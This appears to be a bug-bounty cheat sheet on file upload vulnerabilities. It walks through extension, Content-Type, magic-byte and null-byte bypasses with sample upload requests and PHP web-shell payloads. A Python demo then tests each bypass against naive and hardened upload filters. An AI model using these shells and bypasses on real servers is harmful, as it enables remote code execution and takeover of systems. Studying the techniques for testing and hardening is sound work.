Cheat code for file upload vulnerability by kidnapshadow


File Upload vulnerability

Introduction

An arbitrary file upload vulnerability is a security flaw that lets an attacker upload files of their own choosing onto a server. When the server stores the file under a web-accessible path and later interprets it (for example as a PHP script), the upload becomes remote code execution.

Where to find

Anywhere the application accepts a file from the user, for example a profile photo, PDF or document upload feature.

How to exploit

Follow these steps to find and exploit a file upload vulnerability.

step1: Find a file upload feature on the web application.

step2: Upload a file directly and note the response.

step3: If the upload is only accepted for image files, the server is filtering on the extension, the Content-Type header, or both.

step4: Upload a file in PHP format, intercept the request in Burp Suite, and change the extension to .jpeg or to a double extension such as file.php.jpeg:

POST /images/upload/ HTTP/1.1
Host: target.com

Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpeg"
Content-Type: application/x-php

step5: If the payload is a reverse shell, start a listener in a terminal first. Then request the uploaded file at the location where the server stored it. If the server executes it, you have a shell.

1. Change the Content-Type value. If the filter only inspects the client-supplied Content-Type header, keep the .php filename and change the header from application/x-php to image/jpeg.

Original request:

POST /images/upload/ HTTP/1.1
Host: target.com

Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: application/x-php

Change the Content-Type:

POST /images/upload/ HTTP/1.1
Host: target.com

Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: image/jpeg
2. Change the extension when sending the request. For example, when a .php file is rejected but a .jpg file is accepted, upload it as dapos.php.jpg:

POST /images/upload/ HTTP/1.1
Host: target.com

Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"
Content-Type: application/x-php
---------------------------829348923824

Then change the request to this:

POST /images/upload/ HTTP/1.1
Host: target.com

Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: application/x-php

3. Upload the payload, but start the file content with GIF89a; so that a check on the image header (magic bytes) passes, and set the Content-Type to image/gif:

POST /images/upload/ HTTP/1.1
Host: target.com
...
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: image/gif

GIF89a; <?php system("id") ?>

4. Bypass content length (file size) validation with a very small payload. This one-line PHP shell runs the shell command passed in the x query parameter:

<?=`$_GET[x]`?>

5. Use a null byte in the filename. The extension check sees .gif, but a null-terminated path API stops at the null byte and saves the file as file.php. This only works on legacy stacks; PHP has rejected paths containing a null byte since 5.3.4.

file.php%00.gif

6. Use double extensions for the uploaded file. A blacklist that looks only at the last extension is bypassed, and Apache configured with AddHandler for PHP can execute a file that has .php anywhere in its name.

file.jpg.php1

7. Upload with a less common PHP extension that the blacklist forgot (php4, php5, php6, phtml):

8. Randomly capitalise the file extension. A case-sensitive blacklist misses it, while the web server may still execute it:

file.pHP5
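The procedure above (steps 1 to 5) and the bypass list, as an added example that is not part of the original cheat sheet: a Python script that builds the multipart body for each variant, as the requests above show it, and runs every variant through two naive server-side checks (one that trusts the client Content-Type, one that blacklists .php by its last extension) and one hardened check (extension allowlist, magic bytes matching the extension, server-chosen filename). The checks, payloads, filenames and boundary are constructed for the demonstration and are not taken from any real application.

```python
import os
import secrets

# Constructed sample payloads (not from any real target)
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"
TINY_SHELL = b"<?=`$_GET[x]`?>"          # the short payload from item 4 above
GIF_MAGIC = b"GIF89a"                     # GIF header bytes that item 3 prepends

# Magic bytes the hardened check requires for each allowed extension
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def bypass_variants():
    """One (label, filename, client Content-Type, body) per technique above."""
    return [
        ("1 content-type spoof", "dapos.php", "image/jpeg", PHP_SHELL),
        ("2 php.jpg extension", "dapos.php.jpg", "image/jpeg", PHP_SHELL),
        ("3 gif magic bytes", "dapos.php", "image/gif", GIF_MAGIC + b"; " + PHP_SHELL),
        ("4 tiny payload", "dapos.php", "image/jpeg", TINY_SHELL),
        ("5 null byte", "file.php\x00.gif", "image/gif", PHP_SHELL),
        ("6 jpg.php1 extension", "file.jpg.php1", "image/jpeg", PHP_SHELL),
        ("7 php5 extension", "file.php5", "image/jpeg", PHP_SHELL),
        ("8 mixed case", "file.pHP5", "image/jpeg", PHP_SHELL),
    ]


def build_multipart(field, filename, content_type, body, boundary="829348923824"):
    """Raw multipart/form-data body bytes shaped like the requests above."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    )
    return head.encode("latin-1") + body + f"\r\n--{boundary}--\r\n".encode("ascii")


def naive_content_type_check(filename, content_type):
    """Weak check 1: trusts the Content-Type header the client chose."""
    return content_type.startswith("image/")


def naive_blacklist_check(filename, content_type):
    """Weak check 2: blocks exactly '.php' on the last extension, case-sensitive."""
    return os.path.splitext(filename)[1] not in {".php"}


def c_string_truncate(filename):
    """What a NUL-terminated path API actually stores for the item 5 filename."""
    return filename.split("\x00", 1)[0]


def hardened_check(filename, content_type, body):
    """Allowlist + magic bytes + server-chosen name. Returns (ok, detail)."""
    if any(ord(c) < 0x20 for c in filename):           # kills the null-byte trick
        return False, "control character in filename"
    ext = os.path.splitext(filename)[1].lower()        # .pHP5 -> .php5, .php.jpg -> .jpg
    if ext not in MAGIC:                               # allowlist, never a blacklist
        return False, f"extension {ext!r} not allowed"
    if not body.startswith(MAGIC[ext]):                # content must match the extension
        return False, "magic bytes do not match extension"
    # The client Content-Type is never consulted; the stored name is chosen here.
    return True, secrets.token_hex(8) + ext


def evaluate():
    """label -> (passes content-type check, passes blacklist, passes hardened)."""
    results = {}
    for label, name, ctype, body in bypass_variants():
        results[label] = (
            naive_content_type_check(name, ctype),
            naive_blacklist_check(name, ctype),
            hardened_check(name, ctype, body)[0],
        )
    return results


if __name__ == "__main__":
    for label, (ct, bl, hard) in evaluate().items():
        print(f"{label:22} content-type:{ct!s:6} blacklist:{bl!s:6} hardened:{hard}")
    print(build_multipart("uploaded", "dapos.php.jpg", "image/jpeg", PHP_SHELL).decode("latin-1"))
```

Every variant passes the Content-Type check, and all but the bare dapos.php names slip past the blacklist, which is why the list above works. The hardened check rejects all of them, but note what it still accepts: a GIF89a-prefixed file named photo.gif with PHP inside is a valid upload. That is only safe because the file is stored under a server-chosen name with an image extension, so the upload directory must never be configured to execute scripts.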
